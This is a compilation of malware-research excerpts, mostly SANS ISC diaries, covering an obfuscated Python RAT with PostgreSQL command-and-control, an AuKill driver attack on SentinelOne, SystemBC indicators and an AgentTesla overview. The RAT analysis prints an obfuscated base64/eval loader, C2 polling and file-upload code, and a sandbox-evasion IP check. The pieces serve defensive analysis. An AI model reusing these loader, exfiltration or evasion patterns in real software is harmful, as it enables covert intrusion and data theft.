Get the full Qualys 2023 TotalCloud Security Insights and learn about all five Cloud Risk Facts now.

Download The Report

For modern malware, having access to its C2 (Command and control) is a crucial point. There are many ways to connect to a C2 server using tons of protocols, but today, HTTP remains very common because HTTP is allowed on most networks…

I found a malicious Python script that is pretty well obfuscated. The applied technique reduces its VT score to 6/60! It’s based on a mix of Based64- and Hex-encoded data.

joy = ‘x72x6fx74x31x33’
trust = eval(‘x6dx61x67x69x63’) + eval(‘x63x6fx64x65x63x73x2ex64x65x63x6fx64x65x28x6cx6fx76x65x2cx20x6ax6fx79x29’) + eval(‘x67x6fx64’) + eva
l(‘x63x6fx64x65x63x73x2ex64x65x63x6fx64x65x28x64x65x73x74x69x6ex79x2cx20x6ax6fx79x29’)
eval(compile(base64.b64decode(eval(‘x74x72x75x73x74′)),'<string>’,’exec’))

Note that ‘x72x6fx74x31x33’ is “ROT13!

If the payload is obfuscated, the following lines attracted my attention at the very beginning of the first-stage script:

host = “akfksfjriwjerijweijriewjesjresjfsdfmsdkfjksdjfksdjfsdf”
user = “https://discord.gg/ZHnJfPS6”
database = “https://discord.gg/ZHnJfPS6”
password = “https://discord.gg/ZHnJfPS6”
port = 5432

The port 5432 is used to connect to Postgresql database servers! Unfortunately, it was not possible to get the database server connection details. Probably, the script was submitted to VT as a test. The presence of this line also reveals that SQL queries will be performed:

import psycopg2

The decoded payload contains a lot of SQL queries and reveals C2 communications.

The computer registration:

self.createCur()
self.devid = str(randint(0, 999999))
self.cur.execute(“INSERT INTO zday (devid, ip, hostname) VALUES (‘” + self.devid + “‘, ‘” + ip + “‘, ‘” + host + “‘)”)
self.conn.commit()
self.cur.close()

Reception of commands to execute:

self.createCur()
self.cur.execute(“SELECT command FROM zday WHERE devid = ‘” + self.devid + “‘”)
res = self.cur.fetchone()
command = res[0] if devmode: print(“command: ” + str(command))
if command is not None:
self.cur.close()
self.parseCommand(command)
else:
self.cur.close()

Upload a file:

self.createCur()
self.cur.execute(f”UPDATE zday SET file = {psycopg2.Binary(self.get_bytes_from_file(path))} WHERE devid = ‘” + self.devid + “‘”)
self.conn.commit()
self.cur.close()

Thanks to the parseCommand() function analysis, we can build a list of the bot capabilities:

getPublicIp
getWifiPasses
dir
addToWinStartup
SVCSploit
getCDIR
addLocalToAdmin
screenshot.get
getVersion
sysInfo
disconnect
killKeylogger
fireFig
userPriv
storedCred
netCon
dnsList
‘netConf
arpCache
localAdmin
samBak
schedTasks
‘regup
webcamPic
hideMe
runas
timedcommand
moveScript
selfUpdate
msgBox
changeWallpaper
getfile
gotfile
gotfilekey

I searched for similar scripts with valid credentials, but nothing was found yet. If you spotted the same kind of script, please share!

This is another good proof that egress filtering must be in place to prevent hosts from communicating through exotic ports! (5432 in this case). Stay safe!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyst Blog Post Rectangular Note
Multiple New Campaigns in 2023 Demonstrate The Malware Family Has Been Redeveloped to Remain a Popular And Prominent Threat

EclecticIQ analysts observe the malware family targeting financial information to be used for immediate gain as well as reconnaissance functions to perform initial information gathering and establish persistence. RedLine stealer is almost always accompanied by other malware; either preceded by a loader to install it or succeeded by further malware. In the last major iteration of RedLine stealer in 2022, variants were almost always configured to rely on exploit kits for infection. At some point in 2022 infections saw a relative break in traffic as developers retooled, but in 2023 the malware has re-emerged as a prominent threat and is now reliant on other malware to act as the loader. [1] Most recently, Trend Micro identified a campaign that leveraged trojanized large-language model software to trick users into installing RedLine. [2]Campaign variants emerge in VirusTotal starting the last week of April. [3] Samples very likely undergo initial testing in late April. This is supported by evidence from command and control infrastructure, discussed below. A small initial cluster of RedLine peaks approximately mid-July before tapering off significantly by the beginning of August. Sample volume then resumes in higher volume the second week of August.

discord-malware-and-towinap-the-only-way

Introduction At DomainTools, we take great pride in helping organizations detect and predict emerging threats, including malware infections. When not working, many DomainTools employees and their families also enjoy gaming. When these two worlds collide with the data breach from Discord.io, a popular tool for growing Discord community groups, we take notice. It’s worth starting […]

When you handle a lot of malicious files, you must have a process and tools in place to speedup the analysis. It’s impossible to investigate all files and a key point is to find interesting files that deserve more attention. In my malware analysis lab, I use a repository called my “Malware Zoo” where I put all the files. This repository is shared across different hosts (my computer, REMnux and Windows virtual machines). This helps me to keep all the “dangerous files” in a central location and avoid spreading dangerous stuff everywhere. When you analyze a malware, you’ll quickly generate more files: You extract shellcodes, configurations, DLLs, more executables and those files should also be analyzed. To perform a quick triage with basic operations, I rely on the Inotify[1] suite.

This suite of tools allow to you track changes on a file system. Via command line tools, you can get events when a file has been created, deleted, opened. I’m using a simple script on my malware zoo that receives notifcations everytime a file is created (which means I dropped a new sample). Then the script performs simple actions. By default:

It generates the SHA256 of the file
It performs a lookup on VT

Of course, the script can perform deeper actions depending on the file type. Extract strings from PE files, disassemble a shell code, the sky is the limit!

Here is my simple script:

#!/bin/bash
#
# inotify_triage.sh – Automatic triage script based on inotifywait
#

# Path to monitor
MALWAREZOO=”/data/my_malware_zoo”

inotifywait -m -e create -r –exclude “.(tmp|sha256sum|vtresults|sww+)$” $MALWAREZOO | while read path action file
do
logger “File $file created in $path”

# Generate SHA256
SHA256=`shasum -a 256 $path$file | cut -d ” ” -f 1`
echo $SHA256 >$path$file.sha256sum

# Search file on VT
vt -s $SHA256 >$path$file.vtresults

# PE File
if (file $path$file| grep -q PE32) then
# Perform PE files triage
fi

# Uploaded to MWDB
mwdb.py -t “autotriage” $pathfile
done

Once launched, the script will get notified when a file is create. Very important, you must exclude all files that will be created by the script! This script is running on my REMnux via systemd (to be launched at boot time and kept running in the background.

Warning: the script above is very simple and should perform triage very quickly. If you need to launch time-consuming actions, it’s recommended to launch them in the background!

[1] https://en.wikipedia.org/wiki/Inotify

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This month, my DShield sensor captured for the first time this request: /systembc/password.php. I checked back for the past 6 months and only have noticed this request this 5 times this month from 4 different sources. According to some references, this is likely the SystemBC Remote Access Trojan (RAT), all 4 IPs are part of the Digital Ocean ASN and only one has been reported as likely malicious. Several samples have been reported to Any.run this month.

To verified if there was some kind of change, I reviewed DShield logs submission for the past year and noticed nothing really significant until the beginning of Jan 2023 looking for this directory. However, starting on the 3rd of Aug 2023, there a significant change in the daily report for this directory going from an average of 30 submission to 445 and overing in the hundred since then.[1]

Indicator of Compromised

170.64.155.243
161.35.62.73
165.22.160.237
178.128.79.70

/systembc/password.php
/upl.php

[1] https://isc.sans.edu/weblogs/urlhistory.html?url=%2Fsystembc%2Fpassword.php
[2] https://isc.sans.edu/diary/Excel+spreadsheets+push+SystemBC+malware/27060
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
[4] https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6
[5] https://bazaar.abuse.ch/sample/964a9d8fbfd1886a93c1c09493db044bd37e517c4def61aa779c8734cb5cd68d/
[6] https://any.run/malware-trends/systembc
[7] https://www.virustotal.com/gui/ip-address/178.128.79.70/detection

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Executive summary

AT&T Alien Labs researchers recently discovered a massive campaign of threats delivering a proxy server application to Windows machines. A company is charging for proxy service on traffic that goes through those machines. This is a continuation of research described in our blog on Mac systems turned into proxy exit nodes by AdLoad.

In this research, Alien Labs identified a company that offers proxy services, wherein proxy requests are rerouted through compromised systems that have been transformed into residential exit nodes due to malware infiltration. Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device, Alien Labs has evidence that malware writers are installing the proxy silently in infected systems. In addition, as the proxy application is signed, it has no anti-virus detection, going under the radar of security…

Posted by:
Ofer Caspi

Read full post

Executive summary

On April 21st, 2023, AT&T Managed Extended Detection and Response (MXDR) investigated an attempted ransomware attack on one of our clients, a home improvement business. The investigation revealed the attacker used AuKill malware on the client’s print server to disable the server’s installed EDR solution, SentinelOne, by brute forcing an administrator account and downgrading a driver to a vulnerable version.

AuKill, first identified by Sophos X-Ops researchers in June 2021, is a sophisticated malware designed to target and neutralize specific EDR solutions, including SentinelOne and Sophos. Distributed as a dropper, AuKill drops a vulnerable driver named PROCEXP.SYS (from Process Explorer release version 16.32) into the system’s C:WindowsSystem32drivers folder. This malware has been observed in the wild, utilized by ransomware groups to bypass endpoint security measures and effectively spread ransomware variants such as Medusa Locker and Lockbit on vulnerable systems.

In this case, SentinelOne managed to isolate most of the malicious files before being disabled, preventing a full-scale ransomware incident. As a result, AT&T MXDR found no evidence of data exfiltration or encryption. Despite this, the client opted to rebuild the print server as a precautionary measure. This study provides an in-depth analysis of the attack and offers recommendations to mitigate the risk of future attacks.

Investigating the first phase of the attack

Initial intrusion

The targeted asset was the print server, which we found unusual. However, upon further investigation we concluded the attacker misidentified the asset as a Domain Controller (DC), as it had recently been repurposed from a DC to a print server. The attacker needed both local administrator credentials and kernel-level access to successfully run AuKill and disable SentinelOne on the asset. To gain those local administrator credentials, the attacker successfully brute-forced an administrator account. Shortly after the compromise, this account was observed making unauthorized registry changes.

screen shot of USM IOCs for Aukill

Aukill metadata for ioc

Establishing a beachhead

After compromising the local administrator account, the attackers used the “UsersAdministratorMusicaSentinel” folder as a staging area for subsequent phases of their attack. All AuKill-related binaries and scripts were executed from this path, with the innocuous “Music” folder name helping to conceal their malicious activities.

seemingly innocent Music file - not innocent!

AuKill malware has been found to operate using two Windows services named “aSentinel.exe” and “aSentinelX.exe” in its SentinelOne variant. In other variants, it targets different EDRs, such as Sophos, by utilizing corresponding Windows services like “aSophos.exe” and “aSophosX.exe”.

Aukill mitigated - put in quarantine

Establishing persistence

We also discovered “aSentinel.exe” running from “C:Windowssystem32”, indicating that the attackers attempted to establish a foothold on the compromised server. Malware authors frequently target the system32 folder because it is a trusted location, and security software may not scrutinize files within it as closely as those in other locations. This can help malware bypass security measures and remain hidden. It is likely that the malware was initially placed in the “UsersAdministratorMusicaSentinel” directory and later copied to the system32 directory for persistence.

how Aukill keeps persistent

Network reconnaissance

Our investigation also revealed that PCHunter, a publicly accessible utility previously exploited in ransomware incidents like Dharma, was running from the “UsersAdministratorMusicaSentinel” directory. This suggests that the attackers used PCHunter as a reconnaissance tool to survey the client’s network before deploying the EDR killer malware. Additionally, PCHunter enables threat actors to terminate programs and interface directly with the Windows kernel, which aligns with the needs of the attacker. We observed PCHunter generating several randomly named .sys files, as illustrated below:

Aukill using PCHunter for reconnaisance

Preventing data recovery

We found that the attacker deleted shadow volume copies from the print server. Windows creates these copies to restore files and folders to previous versions in case of data loss. By removing the shadow copies, the attacker was attempting to make it more challenging for our client to recover their files if they were successfully encrypted. Although no ransomware was deployed, the deletion of shadow copies reveals the attackers’ intentions. This information, together with the usage of PCHunter and the staging of the EDR killer malware, paints a more complete picture of the attacker’s objectives and tactics.

Bypassing native Windows protection

With all these pieces in place, the attacker last needed to acquire kernel-level access. Despite gaining administrator rights early on, the attacker did not have enough control over the system to kill SentinelOne at this time. EDR solutions are classified as essential by Windows and are protected from being turned off by attackers when they escalate privileges. To successfully circumvent these safeguards, the attacker would need to travel one level deeper into the operating system and gain kernel-level access to the machine.

Investigating the second phase of the attack

Dropping the vulnerable driver

Our team discovered that AuKill had replaced the current Process Explorer driver, PROCEXP152.sys, with an outdated and vulnerable version named PROCEXP.SYS (from Process Explorer release version 16.32), located in the C:WindowsSystem32drivers directory. The alarm screenshot below demonstrates how AuKill swapped the existing driver with this older version, making the system susceptible to further exploitation.

USM screen - second phase of Aukill remediation

Windows incorporates a security feature called Driver Signature Enforcement, which ensures that kernel-mode drivers are signed by a valid code signing authority before they can run. To bypass this security measure, the attackers exploited the insecure PROCEXP.SYS driver, which was produced and signed by Microsoft at an earlier date. As demonstrated in the SentinelOne screenshot below, the driver is signed and verified by Microsoft. Furthermore, the originating process was aSentinel.exe, an executable created to disable SentinelOne.

aukill remediation

Acquiring kernel-level access

Process Explorer, a legitimate system monitoring tool developed by Microsoft’s Sysinternals team, enables administrators to examine and manage applications’ ongoing processes, as well as their associated threads, handles, and DLLs.

Upon startup, Process Explorer loads a signed kernel-mode driver, facilitating interaction with the system’s kernel, which is responsible for managing hardware and resources. Normally, that driver is PROCEXP152.sys. The attacker replaced the PROCEXP152.sys driver on the print server with the exploitable PROCEXP.SYS, employing what is known as a BYOVD (Bring Your Own Vulnerable Driver) attack. The attacker used this method to exploit the now vulnerable kernel mode driver to gain the kernel-level access they needed to successfully kill SentinelOne.

Killing SentinelOne

The kernel-mode driver used by Process Explorer has the unique ability to terminate handles that are inaccessible even to administrators. A handle is an identifier that corresponds to a specific resource opened by a process, such as a file or a registry key. At this point, AuKill hijacked Process Explorer’s kernel driver to specifically target protected handles associated with SentinelOne processes running on the print server. The SentinelOne processes were killed when the protected process handles were closed, rendering the EDR powerless. AuKill then generated several threads to ensure that these EDR processes remained disabled and did not resume. Each thread concentrated on a certain SentinelOne component and regularly checked to see if the targeted processes were active. If they were, AuKill would terminate them. SentinelOne was out of the way and no longer an obstacle to the attacker.

Response

Customer interaction

At this point, the attacker had gained privileged access to the asset, deployed their malware, and successfully killed the endpoint protection solution, SentinelOne. Based on the Cyber Kill Chain methodology developed by Lockheed Martin, we can conclude that the attacker had now successfully reached the “Command and Control” stage. However, the attacker did not reach the “Actions on Objectives” stage, as SentinelOne managed to disrupt ransomware deployment enough before it was killed to prevent any additional damage.

Any attempts to re-deploy malware or move laterally following the disablement of the EDR were thwarted by our team, who swiftly alerted the client to the activity and advised that the asset be taken offline and isolated from the rest of the network. Our team informed the client that the shadow copies had been deleted and SentinelOne had been turned off on their print server. After having our threat hunters thoroughly review their environment, w e reassured the client that no sensitive information was exfiltrated or encrypted. In response to the attack, the client moved to rebuild their print server and reinstall SentinelOne.

Recommendations

As BYOVD attacks to bypass EDR software become more widespread, we strongly advise blacklisting outdated drivers with a known history of exploitation. Furthermore, we encourage our clients to maintain an inventory of the drivers installed on their systems, ensuring they remain current and secure. Lastly, we recommend bolstering the security of administrator accounts to defend against brute force attacks, as the incident detailed in this blog post could not have transpired without the initial privileged user compromise.

tap 15- 2023
Black Bersek Malware Shares Similarities With Cylance Ransomware

EclecticIQ analysts evaluate that Black Bersek ransomware shares multiple similarities with Cylance ransomware. Both malware families share code similarities; very similar command-line arguments are present and the same encryption cypher, Salsa20, are shared. Ransomware family lifespan is decreasing, resulting in higher numbers of variants. [1] Ransomware families and syndicates are still constantly shifting despite a reported downturn in overall ransomware infections from 2022-2023 [2, 3]. The average ransomware lifespan dropped from 153 days in 2021 to 70 days in 2022. Chainalysis and Malwarebytes report diminishing profits may be driving a drop in ransomware family lifespan – specifically victims refusing to pay. [2] The result of this is organizations must also change tactics more quickly to keep defenses up to date, as families cycle faster with changing techniques.

Digital Threats: Research and Practice, Volume 4, Issue 2, Page 1-22, June 2023.

FortiGuardLabs uncovers the attack method using “search-ms” protocol spreading XWorm and Remcos and also explores Freeze.rs Rust injector and SYK Crypter’s functionalities. Learn more.

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT Security Bulletin

ASB-2023.0166
Microsoft Patch Tuesday update for Microsoft System Center for August 2023
9 August 2023

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Windows Defender Antimalware Platform
Operating System: Windows
Resolution: Patch/Upgrade
CVE Names: CVE-2023-38175

Comment: CVSS (Max): 7.8 CVE-2023-38175 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C)
CVSS Source: Microsoft
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

OVERVIEW

Microsoft has released its monthly security patch update for the
month of August 2023.

This update resolves 1 vulnerability across the following product(s):
[1]

Windows Defender Antimalware Platform

IMPACT

Microsoft has given the following details regarding this vulnerability.

Details Impact Severity
CVE-2023-38175 Elevation of Privilege Important

MITIGATION

Microsoft recommends updating the software to the latest available
version available on the Microsoft Update Catalog. [1]

REFERENCES

[1] Microsoft Security Update Guidanc
https://portal.msrc.microsoft.com/en-us/security-guidance

AusCERT has made every effort to ensure that the information contained
in this document is accurate. However, the decision to use the information
described is the responsibility of each user or organisation. The decision to
follow or act on information or advice contained in this security bulletin is
the responsibility of each user or organisation, and should be considered in
accordance with your organisation’s site policies and procedures. AusCERT
takes no responsibility for consequences which may arise from following or
acting on information or advice contained in this security bulletin.

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: https://auscert.org.au/gpg-key/

iQIVAwUBZNLwgMkNZI30y1K9AQixLg//XxPHXFTkdBYqxIWF9QbkDwSdahzqzoGr
SbUeVdy/Gd3+0l2ocdgD2iPu6z0QWNy4OA3Bmm/bpseUS6ZmHHpDB+rCyD9dVLit
JgfQuV4w9RJzgMnnpwTyzkQI0sTpxkh/7/l9Swj5L6wP3u23U6JEDXcAJgCbC99F
Gb3p1nfXI4p0p1YoxrZDykoDmf9owKNZXHLocFwuaNOhLBju0y2VKKVIGujAxeLT
6mbxMCnwjw1VXkUu4K2vcw+d7SdYtk47LlYg/9HhXPoS89Wa7Qee6aWzNCj267ep
ljVlqVuEwLadpaAspNSXXvna8LYt4Zk6ea4AeD1/E3QYem0PTv/EzO9J0+QsQUYm
3oiPYdgkaluQ1NrLoPB6ky8fBHK/4iqQT7TVExnRD/5Og+hif0UxG9cTc6KHd2vq
DoTlhfSbF1rnkhWwt1UQ+YhmsLPo/XDcU7xSjP+GTdzpRUsI8Sbjd5AgRbHmiR3K
cRHc9AIZid1dPqFy3IVWj6ypKIa7ElItUcNHvhGzdvNPioBIs/oG5fh9eG56wVBz
6DIaHOq6km29KJuympJz0ZOmU6Pl+fLqIUE1l+F9ziT9ZzJ182lcJW097aIN31oa
XyhhjBPprB/HpmXeeTGIUsdXJNq/6BJ/7fJELtPRK2mAQ+q9JcpHwezF2y47Ip5d
yrg3TyUOKJc=
=Cetm
—–END PGP SIGNATURE—–

Modern malware samples implement a lot of anti-debugging and anti-analysis techniques. The idea is to slow down the malware analyst’s job or, more simply, to bypass security solutions like sandboxes. These days, I see more and more malware samples written in Python that have these built-in capabilities. One of them is the detection of “suspicious” IP addresses.

The last one I found has the SHA256 9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b with a VT score of 8/57[1].

Here is a common code snippet:

def check_ip():
blacklisted = { … }
while True:
try:
ip = urllib.request.urlopen(‘https://checkip.amazonaws.com’).read().decode().strip()
if ip in blacklisted:
exit_program(‘Blacklisted IP Detected’)
return
except:
pass

The malware will query the public IP address of the host where it is running and, if it is present on the “blacklisted” list, it will exit… But what are these IP addresses? I had a look at them and here is the list:

IP Address

PTR Record

AS Name

AS Country

Attacks (ISC)

Count (ISC)

20[.]99[.]160[.]173

NXDOMAIN

MICROSOFT-CORP-MSN-AS-BLOCK

23[.]128[.]248[.]46

tor-exit46[.]stormycloud[.]org

DATAIDEAS-LLC

34[.]105[.]0[.]27

27[.]0[.]105[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]105[.]183[.]68

68[.]183[.]105[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]105[.]72[.]241

241[.]72[.]105[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]138[.]96[.]23

23[.]96[.]138[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]141[.]146[.]114

114[.]146[.]141[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]141[.]245[.]25

25[.]245[.]141[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]142[.]74[.]220

220[.]74[.]142[.]34[.]bc[.]googleusercontent[.]com

GOOGLE

34[.]145[.]195[.]58

58[.]195[.]145[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]145[.]89[.]174

174[.]89[.]145[.]34[.]bc[.]googleusercontent[.]com

GOOGLE

34[.]253[.]248[.]228

ec2-34-253-248-228[.]eu-west-1[.]compute[.]amazonaws[.]com

AMAZON-02

34[.]83[.]46[.]130

130[.]46[.]83[.]34[.]bc[.]googleusercontent[.]com[

GOOGLE-CLOUD-PLATFORM

34[.]85[.]243[.]241

241[.]243[.]85[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

34[.]85[.]253[.]170

170[.]253[.]85[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

35[.]192[.]93[.]107

107[.]93[.]192[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

35[.]199[.]6[.]13

13[.]6[.]199[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

35[.]229[.]69[.]227

227[.]69[.]229[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

35[.]237[.]47[.]12

12[.]47[.]237[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

64[.]124[.]12[.]162

64[.]124[.]12[.]162[.]IDIA-144793-004-ZYO[.]zip[.]zayo[.]com

ZAYO-6461

78[.]139[.]8[.]50

catv-78-139-8-50[.]catv[.]fixed[.]vodafone[.]hu

ASN-VODAFONE-

79[.]104[.]209[.]33

NXDOMAIN

SOVAM-AS

80[.]211[.]0[.]97

host97-0-211-80[.]serverdedicati[.]aruba[.]it

ARUBA-ASN

84[.]147[.]54[.]113

p54933671[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

84[.]147[.]62[.]12

p54933e0c[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

87[.]166[.]50[.]213

p57a632d5[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

88[.]132[.]225[.]100

host-88-132-225-100[.]kabelszat2002[.]hu

GAX-KABELSZAT

88[.]132[.]226[.]203

host-88-132-226-203[.]kabelszat2002[.]hu

GAX-KABELSZAT

88[.]132[.]227[.]238

host-88-132-227-238[.]kabelszat2002[.]hu

GAX-KABELSZAT

88[.]132[.]231[.]71

host-88-132-231-71[.]kabelszat2002[.]hu

GAX-KABELSZAT

88[.]153[.]199[.]169

ip-088-153-199-169[.]um27[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

92[.]211[.]109[.]160

ipservice-092-211-109-160[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

92[.]211[.]192[.]144

ipservice-092-211-192-144[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

92[.]211[.]52[.]62

ipservice-092-211-052-062[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

92[.]211[.]55[.]199

ipservice-092-211-055-199[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

93[.]216[.]75[.]209

p5dd84bd1[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

95[.]25[.]204[.]90

95-25-204-90[.]broadband[.]corbina[.]ru

CORBINA-AS OJSC Vimpelcom

95[.]25[.]81[.]24

95-25-81-24[.]broadband[.]corbina[.]ru

CORBINA-AS OJSC Vimpelcom

104[.]18[.]12[.]38

NXDOMAIN

CLOUDFLARENET

109[.]145[.]173[.]169

host109-145-173-169[.]range109-145[.]btcentralplus[.]com

BT-UK-AS BTnet UK Regional network

109[.]74[.]154[.]90

SERVFAIL

VNET-AS

109[.]74[.]154[.]91

SERVFAIL

VNET-AS

109[.]74[.]154[.]92

SERVFAIL

VNET-AS

178[.]239[.]165[.]70

70[.]165[.]239[.]178[.]baremetal[.]zare[.]com

BANDWIDTH-AS

188[.]105[.]91[.]116

dslb-188-105-091-116[.]188[.]105[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

188[.]105[.]91[.]143

dslb-188-105-091-143[.]188[.]105[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

188[.]105[.]91[.]173

dslb-188-105-091-173[.]188[.]105[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

192[.]211[.]110[.]74

NXDOMAIN

DNIC-ASBLK-00721-00726

192[.]40[.]57[.]234

NXDOMAIN

PERFORMIVE

192[.]87[.]28[.]103

192[.]87[.]28[.]103[.]dyn[.]centr[.]nl

SURFNET-NL SURFnet, The Netherlands

193[.]128[.]114[.]45

h193-128-114-45[.]ptr[.]roamsite[.]com

UUNET

193[.]225[.]193[.]201

NXDOMAIN

HBONE-AS KIFU

194[.]154[.]78[.]160

SERVFAIL

SOVAM-AS

195[.]181[.]175[.]105

unn-195-181-175-105[.]datapacket[.]com

CDN77 \^_^

195[.]239[.]51[.]3

NXDOMAIN

SOVAM-AS

195[.]239[.]51[.]59

NXDOMAIN

SOVAM-AS

195[.]74[.]76[.]222

r-222[.]76[.]74[.]195[.]ptr[.]avast[.]com

AVAST-AS-DC

212[.]119[.]227[.]151

NXDOMAIN

SOVAM-AS

212[.]119[.]227[.]167

NXDOMAIN

SOVAM-AS

213[.]33[.]142[.]50

mail[.]areal-hotel[.]ru

SOVAM-AS

Most of these IP addresses belong to major cloud providers. You can also see that some of them have a non-zero number of attacks/counts (results extracted from our AP[2]). Probably most of them are sandboxes or analysis systems deployed by security companies or researchers? I did a quick nmap scan of them and most do not export any port/service.

In the case above, the IP address verification is not performed to detect if the computers is an interesting host to infect or not (classic scenario: when country “x” would like to attack country “y”). In such scenario, the performed tests will rely on big IP pools used by Internet providers, the keyboard mapping, the OS language, etc…

I will keep this list of IP addresses up-to-date amongst my discovered samples and see if there are big changes.

[1] https://www[.]virustotal[.]com/gui/file/9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b
[2] https://isc.sans.edu/api/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Actualmente las campañas de malware constituyen una amenaza significativa a nivel regional e internacional, ya que los ciberdelincuentes están adaptando sus tácticas para aprovechar las vulnerabilidades existentes, causando un gran impacto sobre la seguridad de los sistemas e infraestructuras con el desarrollo de nuevas variantes de malware, tales como AgentTesla, NanoCore, RemcosRAT, SnakeKeylogger, etc.

El panorama de la ciberseguridad está evolucionando exponencialmente, y el malware se ha convertido en una de las mayores amenazas para las organizaciones en todo el mundo. Los ciberdelincuentes continúan mejorando sus técnicas y herramientas para comprometer sistemas, robar información confidencial y causar daños significativos.

La infección por malware se ha convertido en la primera inquietud para las organizaciones en Latinoamérica, por delante del robo de información (60%) y el acceso indebido a los sistemas (56%). Así lo pone de manifiesto el ESET Security Report 2022, el informe anual que analiza el panorama de ciberseguridad en Latinoamérica.

En lo relativo al malware, la preocupación es justificada: en 2022, el 34% de los ciberincidentes que sufrieron las empresas latinoamericanas tuvo que ver con códigos maliciosos. A tenor de los datos de ESET, las organizaciones de Perú (18%) fueron las más afectadas, situándose a continuación las de México (17%), Colombia (12%), Argentina (11%) y Ecuador (9%).

A continuación, se presenta una lista de malware que se encuentra operando activamente a nivel mundial y que dispone de la capacidad de extenderse a América Latina:

AgentTesla

Agent Tesla es un malware del tipo remote access trojan (RAT) que está activo desde 2014 y que es distribuido como un Malware-as-a-Service (MaaS) en campañas a nivel global.

Este malware está desarrollado con el framework .NET y es utilizado para espiar y robar información de los equipos comprometidos, ya que cuenta con la capacidad de extraer credenciales de distintos softwares, obtener cookies de navegadores de Internet, registrar las pulsaciones del teclado de la máquina (Keylogging), así como realizar capturas de pantalla y del clipboard (portapapeles). Este código malicioso utiliza distintos métodos para el envío de la información recopilada hacia el atacante.

A su vez, se ha visto que esta amenaza puede venir incluida dentro de un empaquetador (packer) con distintas capas de ofuscación. Esto es utilizado para tratar de evadir las soluciones de seguridad y dificultar el proceso de investigación y análisis del malware. Estos empaquetadores pueden implementar distintas técnicas para obtener información de la máquina sobre la que se está ejecutando, para, por ejemplo, averiguar si es una máquina virtual o una máquina sandbox, y en caso de ser así, evitar su ejecución.

Métodos de propagación e infección

Esta amenaza suele propagarse por medio de correos electrónicos de phishing que incluyen un archivo adjunto malicioso con el cual buscan engañar al usuario que recibe el correo para hacer que descargue y ejecute este contenido. Por ejemplo, se utilizan correos de la empresa de reparto DHL, tal como se puede observar a continuación:

Fig. 1. Correo de phishing en la Operación Guinea Pig. (Fuente: welivesecurity.com)

La informalidad con la que está redactado el correo debe crear una firme sospecha. Por otro lado, es importante señalar que el archivo adjunto tiene doble extensión, .jpg.xxe, que revela que el archivo se encuentra comprimido.

Con respecto a los archivos maliciosos adjuntos, los mismos pueden variar, ya sea para engañar al usuario como también para evadir las soluciones de seguridad. Por ejemplo, pueden ser archivos comprimidos, documentos del paquete Office o un archivo ejecutable, etc.

IoC de AgentTesla

